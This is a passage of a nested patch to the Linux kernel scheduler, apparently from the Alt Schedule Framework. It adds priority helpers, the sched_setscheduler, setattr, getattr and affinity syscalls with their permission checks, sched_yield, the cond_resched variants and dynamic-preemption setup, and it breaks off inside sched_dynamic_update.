++int task_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
++		task_sched_prio_normal(p, task_rq(p));
++}
++
++/**
++ * idle_cpu - is a given CPU idle currently?
++ * @cpu: the processor in question.
++ *
++ * Return: 1 if the CPU is currently idle. 0 otherwise.
++ */
++int idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (rq->curr != rq->idle)
++		return 0;
++
++	if (rq->nr_running)
++		return 0;
++
++#ifdef CONFIG_SMP
++	if (rq->ttwu_pending)
++		return 0;
++#endif
++
++	return 1;
++}
++
++/**
++ * idle_task - return the idle task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * Return: The idle task for the cpu @cpu.
++ */
++struct task_struct *idle_task(int cpu)
++{
++	return cpu_rq(cpu)->idle;
++}
++
++/**
++ * find_process_by_pid - find a process with a matching PID value.
++ * @pid: the pid in question.
++ *
++ * The task of @pid, if found. %NULL otherwise.
++ */
++static inline struct task_struct *find_process_by_pid(pid_t pid)
++{
++	return pid ? find_task_by_vpid(pid) : current;
++}
++
++/*
++ * sched_setparam() passes in -1 for its policy, to let the functions
++ * it calls know not to change it.
++ */
++#define SETPARAM_POLICY -1
++
++static void __setscheduler_params(struct task_struct *p,
++		const struct sched_attr *attr)
++{
++	int policy = attr->sched_policy;
++
++	if (policy == SETPARAM_POLICY)
++		policy = p->policy;
++
++	p->policy = policy;
++
++	/*
++	 * allow normal nice value to be set, but will not have any
++	 * effect on scheduling until the task not SCHED_NORMAL/
++	 * SCHED_BATCH
++	 */
++	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
++
++	/*
++	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
++	 * !rt_policy. Always setting this ensures that things like
++	 * getparam()/getattr() don't report silly values for !rt tasks.
++	 */
++	p->rt_priority = attr->sched_priority;
++	p->normal_prio = normal_prio(p);
++}
++
++/*
++ * check the target process has a UID that matches the current process's
++ */
++static bool check_same_owner(struct task_struct *p)
++{
++	const struct cred *cred = current_cred(), *pcred;
++	bool match;
++
++	rcu_read_lock();
++	pcred = __task_cred(p);
++	match = (uid_eq(cred->euid, pcred->euid) ||
++		 uid_eq(cred->euid, pcred->uid));
++	rcu_read_unlock();
++	return match;
++}
++
++/*
++ * Allow unprivileged RT tasks to decrease priority.
++ * Only issue a capable test if needed and only once to avoid an audit
++ * event on permitted non-privileged operations:
++ */
++static int user_check_sched_setscheduler(struct task_struct *p,
++					 const struct sched_attr *attr,
++					 int policy, int reset_on_fork)
++{
++	if (rt_policy(policy)) {
++		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
++
++		/* Can't set/change the rt policy: */
++		if (policy != p->policy && !rlim_rtprio)
++			goto req_priv;
++
++		/* Can't increase priority: */
++		if (attr->sched_priority > p->rt_priority &&
++		    attr->sched_priority > rlim_rtprio)
++			goto req_priv;
++	}
++
++	/* Can't change other user's priorities: */
++	if (!check_same_owner(p))
++		goto req_priv;
++
++	/* Normal users shall not reset the sched_reset_on_fork flag: */
++	if (p->sched_reset_on_fork && !reset_on_fork)
++		goto req_priv;
++
++	return 0;
++
++req_priv:
++	if (!capable(CAP_SYS_NICE))
++		return -EPERM;
++
++	return 0;
++}
++
++static int __sched_setscheduler(struct task_struct *p,
++				const struct sched_attr *attr,
++				bool user, bool pi)
++{
++	const struct sched_attr dl_squash_attr = {
++		.size		= sizeof(struct sched_attr),
++		.sched_policy	= SCHED_FIFO,
++		.sched_nice	= 0,
++		.sched_priority = 99,
++	};
++	int oldpolicy = -1, policy = attr->sched_policy;
++	int retval, newprio;
++	struct balance_callback *head;
++	unsigned long flags;
++	struct rq *rq;
++	int reset_on_fork;
++	raw_spinlock_t *lock;
++
++	/* The pi code expects interrupts enabled */
++	BUG_ON(pi && in_interrupt());
++
++	/*
++	 * Alt schedule FW supports SCHED_DEADLINE by squash it as prio 0 SCHED_FIFO
++	 */
++	if (unlikely(SCHED_DEADLINE == policy)) {
++		attr = &dl_squash_attr;
++		policy = attr->sched_policy;
++	}
++recheck:
++	/* Double check policy once rq lock held */
++	if (policy < 0) {
++		reset_on_fork = p->sched_reset_on_fork;
++		policy = oldpolicy = p->policy;
++	} else {
++		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
++
++		if (policy > SCHED_IDLE)
++			return -EINVAL;
++	}
++
++	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
++		return -EINVAL;
++
++	/*
++	 * Valid priorities for SCHED_FIFO and SCHED_RR are
++	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
++	 * SCHED_BATCH and SCHED_IDLE is 0.
++	 */
++	if (attr->sched_priority < 0 ||
++	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
++	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
++		return -EINVAL;
++	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
++	    (attr->sched_priority != 0))
++		return -EINVAL;
++
++	if (user) {
++		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
++		if (retval)
++			return retval;
++
++		retval = security_task_setscheduler(p);
++		if (retval)
++			return retval;
++	}
++
++	if (pi)
++		cpuset_read_lock();
++
++	/*
++	 * Make sure no PI-waiters arrive (or leave) while we are
++	 * changing the priority of the task:
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++
++	/*
++	 * To be able to change p->policy safely, task_access_lock()
++	 * must be called.
++	 * IF use task_access_lock() here:
++	 * For the task p which is not running, reading rq->stop is
++	 * racy but acceptable as ->stop doesn't change much.
++	 * An enhancemnet can be made to read rq->stop saftly.
++	 */
++	rq = __task_access_lock(p, &lock);
++
++	/*
++	 * Changing the policy of the stop threads its a very bad idea
++	 */
++	if (p == rq->stop) {
++		retval = -EINVAL;
++		goto unlock;
++	}
++
++	/*
++	 * If not changing anything there's no need to proceed further:
++	 */
++	if (unlikely(policy == p->policy)) {
++		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
++			goto change;
++		if (!rt_policy(policy) &&
++		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
++			goto change;
++
++		p->sched_reset_on_fork = reset_on_fork;
++		retval = 0;
++		goto unlock;
++	}
++change:
++
++	/* Re-check policy now with rq lock held */
++	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
++		policy = oldpolicy = -1;
++		__task_access_unlock(p, lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++		if (pi)
++			cpuset_read_unlock();
++		goto recheck;
++	}
++
++	p->sched_reset_on_fork = reset_on_fork;
++
++	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
++	if (pi) {
++		/*
++		 * Take priority boosted tasks into account. If the new
++		 * effective priority is unchanged, we just store the new
++		 * normal parameters and do not touch the scheduler class and
++		 * the runqueue. This will be done when the task deboost
++		 * itself.
++		 */
++		newprio = rt_effective_prio(p, newprio);
++	}
++
++	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
++		__setscheduler_params(p, attr);
++		__setscheduler_prio(p, newprio);
++	}
++
++	check_task_changed(p, rq);
++
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++	head = splice_balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	if (pi) {
++		cpuset_read_unlock();
++		rt_mutex_adjust_pi(p);
++	}
++
++	/* Run balance callbacks after we've adjusted the PI chain: */
++	balance_callbacks(rq, head);
++	preempt_enable();
++
++	return 0;
++
++unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++	if (pi)
++		cpuset_read_unlock();
++	return retval;
++}
++
++static int _sched_setscheduler(struct task_struct *p, int policy,
++			       const struct sched_param *param, bool check)
++{
++	struct sched_attr attr = {
++		.sched_policy   = policy,
++		.sched_priority = param->sched_priority,
++		.sched_nice     = PRIO_TO_NICE(p->static_prio),
++	};
++
++	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
++	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
++		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++		policy &= ~SCHED_RESET_ON_FORK;
++		attr.sched_policy = policy;
++	}
++
++	return __sched_setscheduler(p, &attr, check, true);
++}
++
++/**
++ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Use sched_set_fifo(), read its comment.
++ *
++ * Return: 0 on success. An error code otherwise.
++ *
++ * NOTE that the task may be already dead.
++ */
++int sched_setscheduler(struct task_struct *p, int policy,
++		       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, true);
++}
++
++int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, true, true);
++}
++
++int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, false, true);
++}
++EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
++
++/**
++ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Just like sched_setscheduler, only don't bother checking if the
++ * current context has permission.  For example, this is needed in
++ * stop_machine(): we create temporary high priority worker threads,
++ * but our caller might not have that capability.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++int sched_setscheduler_nocheck(struct task_struct *p, int policy,
++			       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, false);
++}
++
++/*
++ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
++ * incapable of resource management, which is the one thing an OS really should
++ * be doing.
++ *
++ * This is of course the reason it is limited to privileged users only.
++ *
++ * Worse still; it is fundamentally impossible to compose static priority
++ * workloads. You cannot take two correctly working static prio workloads
++ * and smash them together and still expect them to work.
++ *
++ * For this reason 'all' FIFO tasks the kernel creates are basically at:
++ *
++ *   MAX_RT_PRIO / 2
++ *
++ * The administrator _MUST_ configure the system, the kernel simply doesn't
++ * know enough information to make a sensible choice.
++ */
++void sched_set_fifo(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo);
++
++/*
++ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
++ */
++void sched_set_fifo_low(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = 1 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo_low);
++
++void sched_set_normal(struct task_struct *p, int nice)
++{
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++		.sched_nice = nice,
++	};
++	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_normal);
++
++static int
++do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
++{
++	struct sched_param lparam;
++	struct task_struct *p;
++	int retval;
++
++	if (!param || pid < 0)
++		return -EINVAL;
++	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
++		return -EFAULT;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setscheduler(p, policy, &lparam);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/*
++ * Mimics kernel/events/core.c perf_copy_attr().
++ */
++static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
++{
++	u32 size;
++	int ret;
++
++	/* Zero the full structure, so that a short copy will be nice: */
++	memset(attr, 0, sizeof(*attr));
++
++	ret = get_user(size, &uattr->size);
++	if (ret)
++		return ret;
++
++	/* ABI compatibility quirk: */
++	if (!size)
++		size = SCHED_ATTR_SIZE_VER0;
++
++	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
++		goto err_size;
++
++	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
++	if (ret) {
++		if (ret == -E2BIG)
++			goto err_size;
++		return ret;
++	}
++
++	/*
++	 * XXX: Do we want to be lenient like existing syscalls; or do we want
++	 * to be strict and return an error on out-of-bounds values?
++	 */
++	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
++
++	/* sched/core.c uses zero here but we already know ret is zero */
++	return 0;
++
++err_size:
++	put_user(sizeof(*attr), &uattr->size);
++	return -E2BIG;
++}
++
++/**
++ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
++ * @pid: the pid in question.
++ * @policy: new policy.
++ *
++ * Return: 0 on success. An error code otherwise.
++ * @param: structure containing the new RT priority.
++ */
++SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
++{
++	if (policy < 0)
++		return -EINVAL;
++
++	return do_sched_setscheduler(pid, policy, param);
++}
++
++/**
++ * sys_sched_setparam - set/change the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
++{
++	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
++}
++
++/**
++ * sys_sched_setattr - same as above, but with extended sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ */
++SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
++			       unsigned int, flags)
++{
++	struct sched_attr attr;
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || flags)
++		return -EINVAL;
++
++	retval = sched_copy_attr(uattr, &attr);
++	if (retval)
++		return retval;
++
++	if ((int)attr.sched_policy < 0)
++		return -EINVAL;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setattr(p, &attr);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
++ * @pid: the pid in question.
++ *
++ * Return: On success, the policy of the thread. Otherwise, a negative error
++ * code.
++ */
++SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
++{
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (pid < 0)
++		goto out_nounlock;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (p) {
++		retval = security_task_getscheduler(p);
++		if (!retval)
++			retval = p->policy;
++	}
++	rcu_read_unlock();
++
++out_nounlock:
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the RT priority.
++ *
++ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
++ * code.
++ */
++SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
++{
++	struct sched_param lp = { .sched_priority = 0 };
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (!param || pid < 0)
++		goto out_nounlock;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	if (task_has_rt_policy(p))
++		lp.sched_priority = p->rt_priority;
++	rcu_read_unlock();
++
++	/*
++	 * This one might sleep, we cannot do it with a spinlock held ...
++	 */
++	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
++
++out_nounlock:
++	return retval;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/*
++ * Copy the kernel size attribute structure (which might be larger
++ * than what user-space knows about) to user-space.
++ *
++ * Note that all cases are valid: user-space buffer can be larger or
++ * smaller than the kernel-space buffer. The usual case is that both
++ * have the same size.
++ */
++static int
++sched_attr_copy_to_user(struct sched_attr __user *uattr,
++			struct sched_attr *kattr,
++			unsigned int usize)
++{
++	unsigned int ksize = sizeof(*kattr);
++
++	if (!access_ok(uattr, usize))
++		return -EFAULT;
++
++	/*
++	 * sched_getattr() ABI forwards and backwards compatibility:
++	 *
++	 * If usize == ksize then we just copy everything to user-space and all is good.
++	 *
++	 * If usize < ksize then we only copy as much as user-space has space for,
++	 * this keeps ABI compatibility as well. We skip the rest.
++	 *
++	 * If usize > ksize then user-space is using a newer version of the ABI,
++	 * which part the kernel doesn't know about. Just ignore it - tooling can
++	 * detect the kernel's knowledge of attributes from the attr->size value
++	 * which is set to ksize in this case.
++	 */
++	kattr->size = min(usize, ksize);
++
++	if (copy_to_user(uattr, kattr, kattr->size))
++		return -EFAULT;
++
++	return 0;
++}
++
++/**
++ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @usize: sizeof(attr) for fwd/bwd comp.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
++		unsigned int, usize, unsigned int, flags)
++{
++	struct sched_attr kattr = { };
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
++	    usize < SCHED_ATTR_SIZE_VER0 || flags)
++		return -EINVAL;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	kattr.sched_policy = p->policy;
++	if (p->sched_reset_on_fork)
++		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++	if (task_has_rt_policy(p))
++		kattr.sched_priority = p->rt_priority;
++	else
++		kattr.sched_nice = task_nice(p);
++	kattr.sched_flags &= SCHED_FLAG_ALL;
++
++#ifdef CONFIG_UCLAMP_TASK
++	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
++	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
++#endif
++
++	rcu_read_unlock();
++
++	return sched_attr_copy_to_user(uattr, &kattr, usize);
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
++{
++	int retval;
++	cpumask_var_t cpus_allowed, new_mask;
++
++	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
++		return -ENOMEM;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
++		retval = -ENOMEM;
++		goto out_free_cpus_allowed;
++	}
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	cpumask_and(new_mask, mask, cpus_allowed);
++again:
++	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
++	if (retval)
++		goto out_free_new_mask;
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	if (!cpumask_subset(new_mask, cpus_allowed)) {
++		/*
++		 * We must have raced with a concurrent cpuset
++		 * update. Just reset the cpus_allowed to the
++		 * cpuset's cpus_allowed
++		 */
++		cpumask_copy(new_mask, cpus_allowed);
++		goto again;
++	}
++
++out_free_new_mask:
++	free_cpumask_var(new_mask);
++out_free_cpus_allowed:
++	free_cpumask_var(cpus_allowed);
++	return retval;
++}
++
++long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
++{
++	struct task_struct *p;
++	int retval;
++
++	rcu_read_lock();
++
++	p = find_process_by_pid(pid);
++	if (!p) {
++		rcu_read_unlock();
++		return -ESRCH;
++	}
++
++	/* Prevent p going away */
++	get_task_struct(p);
++	rcu_read_unlock();
++
++	if (p->flags & PF_NO_SETAFFINITY) {
++		retval = -EINVAL;
++		goto out_put_task;
++	}
++
++	if (!check_same_owner(p)) {
++		rcu_read_lock();
++		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
++			rcu_read_unlock();
++			retval = -EPERM;
++			goto out_put_task;
++		}
++		rcu_read_unlock();
++	}
++
++	retval = security_task_setscheduler(p);
++	if (retval)
++		goto out_put_task;
++
++	retval = __sched_setaffinity(p, in_mask);
++out_put_task:
++	put_task_struct(p);
++	return retval;
++}
++
++static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
++			     struct cpumask *new_mask)
++{
++	if (len < cpumask_size())
++		cpumask_clear(new_mask);
++	else if (len > cpumask_size())
++		len = cpumask_size();
++
++	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
++}
++
++/**
++ * sys_sched_setaffinity - set the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to the new CPU mask
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	cpumask_var_t new_mask;
++	int retval;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
++	if (retval == 0)
++		retval = sched_setaffinity(pid, new_mask);
++	free_cpumask_var(new_mask);
++	return retval;
++}
++
++long sched_getaffinity(pid_t pid, cpumask_t *mask)
++{
++	struct task_struct *p;
++	raw_spinlock_t *lock;
++	unsigned long flags;
++	int retval;
++
++	rcu_read_lock();
++
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	task_access_lock_irqsave(p, &lock, &flags);
++	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++out_unlock:
++	rcu_read_unlock();
++
++	return retval;
++}
++
++/**
++ * sys_sched_getaffinity - get the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to hold the current CPU mask
++ *
++ * Return: size of CPU mask copied to user_mask_ptr on success. An
++ * error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	int ret;
++	cpumask_var_t mask;
++
++	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
++		return -EINVAL;
++	if (len & (sizeof(unsigned long)-1))
++		return -EINVAL;
++
++	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	ret = sched_getaffinity(pid, mask);
++	if (ret == 0) {
++		unsigned int retlen = min_t(size_t, len, cpumask_size());
++
++		if (copy_to_user(user_mask_ptr, mask, retlen))
++			ret = -EFAULT;
++		else
++			ret = retlen;
++	}
++	free_cpumask_var(mask);
++
++	return ret;
++}
++
++static void do_sched_yield(void)
++{
++	struct rq *rq;
++	struct rq_flags rf;
++
++	if (!sched_yield_type)
++		return;
++
++	rq = this_rq_lock_irq(&rf);
++
++	schedstat_inc(rq->yld_count);
++
++	if (1 == sched_yield_type) {
++		if (!rt_task(current))
++			do_sched_yield_type_1(current, rq);
++	} else if (2 == sched_yield_type) {
++		if (rq->nr_running > 1)
++			rq->skip = current;
++	}
++
++	preempt_disable();
++	raw_spin_unlock_irq(&rq->lock);
++	sched_preempt_enable_no_resched();
++
++	schedule();
++}
++
++/**
++ * sys_sched_yield - yield the current processor to other threads.
++ *
++ * This function yields the current CPU to other tasks. If there are no
++ * other threads running on this CPU then this function will return.
++ *
++ * Return: 0.
++ */
++SYSCALL_DEFINE0(sched_yield)
++{
++	do_sched_yield();
++	return 0;
++}
++
++#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
++int __sched __cond_resched(void)
++{
++	if (should_resched(0)) {
++		preempt_schedule_common();
++		return 1;
++	}
++	/*
++	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
++	 * whether the current CPU is in an RCU read-side critical section,
++	 * so the tick can report quiescent states even for CPUs looping
++	 * in kernel context.  In contrast, in non-preemptible kernels,
++	 * RCU readers leave no in-memory hints, which means that CPU-bound
++	 * processes executing in kernel context might never report an
++	 * RCU quiescent state.  Therefore, the following code causes
++	 * cond_resched() to report a quiescent state, but only when RCU
++	 * is in urgent need of one.
++	 */
++#ifndef CONFIG_PREEMPT_RCU
++	rcu_all_qs();
++#endif
++	return 0;
++}
++EXPORT_SYMBOL(__cond_resched);
++#endif
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define cond_resched_dynamic_enabled	__cond_resched
++#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(cond_resched);
++
++#define might_resched_dynamic_enabled	__cond_resched
++#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(might_resched);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
++int __sched dynamic_cond_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_cond_resched);
++
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
++int __sched dynamic_might_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_might_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_might_resched);
++#endif
++#endif
++
++/*
++ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
++ * call schedule, and on return reacquire the lock.
++ *
++ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
++ * operations here to prevent schedule() from being called twice (once via
++ * spin_unlock(), once by hand).
++ */
++int __cond_resched_lock(spinlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held(lock);
++
++	if (spin_needbreak(lock) || resched) {
++		spin_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		spin_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_lock);
++
++int __cond_resched_rwlock_read(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_read(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		read_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		read_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_read);
++
++int __cond_resched_rwlock_write(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_write(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		write_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		write_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_write);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++
++#ifdef CONFIG_GENERIC_ENTRY
++#include <linux/entry-common.h>
++#endif
++
++/*
++ * SC:cond_resched
++ * SC:might_resched
++ * SC:preempt_schedule
++ * SC:preempt_schedule_notrace
++ * SC:irqentry_exit_cond_resched
++ *
++ *
++ * NONE:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * VOLUNTARY:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- __cond_resched
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * FULL:
++ *   cond_resched               <- RET0
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- preempt_schedule
++ *   preempt_schedule_notrace   <- preempt_schedule_notrace
++ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
++ */
++
++enum {
++	preempt_dynamic_undefined = -1,
++	preempt_dynamic_none,
++	preempt_dynamic_voluntary,
++	preempt_dynamic_full,
++};
++
++int preempt_dynamic_mode = preempt_dynamic_undefined;
++
++int sched_dynamic_mode(const char *str)
++{
++	if (!strcmp(str, "none"))
++		return preempt_dynamic_none;
++
++	if (!strcmp(str, "voluntary"))
++		return preempt_dynamic_voluntary;
++
++	if (!strcmp(str, "full"))
++		return preempt_dynamic_full;
++
++	return -EINVAL;
++}
++
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
++#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
++#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
++#else
++#error "Unsupported PREEMPT_DYNAMIC mechanism"
++#endif
++
++void sched_dynamic_update(int mode)
++{
